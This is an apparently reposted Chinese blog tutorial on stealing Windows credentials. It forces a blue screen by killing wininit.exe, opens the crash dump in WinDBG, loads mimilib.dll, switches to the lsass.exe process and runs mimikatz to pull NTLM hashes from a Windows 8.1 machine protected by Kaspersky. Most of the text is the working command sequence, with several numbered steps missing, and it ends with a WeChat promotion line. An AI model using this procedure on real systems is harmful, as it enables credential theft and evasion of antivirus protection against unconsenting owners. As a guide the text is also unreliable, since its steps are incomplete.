通过Windows蓝屏文件来抓密码!
文章作者 :Mr.Wu
原文链接 :
https://www.mrwu.red/web/2000.html
需要的工具:WinDBG+mimilib.dll
测试环境一:win8.1
kaspersky2019(病毒库为2018.10.25号的)
3、获取蓝屏后的dmp文件,使系统蓝屏的方法有很多,比如说强制结束系统进程,我这里选择强制结束系统进程wininit.exe
管理员权限运行cmd后,执行taskkill /f /im "wininit.exe"
微信搜索公众号:Linux技术迷,回复:linux 领取资料 。
.load C:\Users\Administrator\Desktop\qqq\mimilib.dll注意load 前面那个点别漏掉
.SymFix
8、重新加载
.Reload
9、查看lsass.exe进程的内存地址
!process 0 0 lsass.exe
10、切换到lsass.exe进程中
.process /r /p fffffa800e069b00
!mimikatz
=======================
到此装有kaspersky测试机器win8.1的ntml hash 就成功获得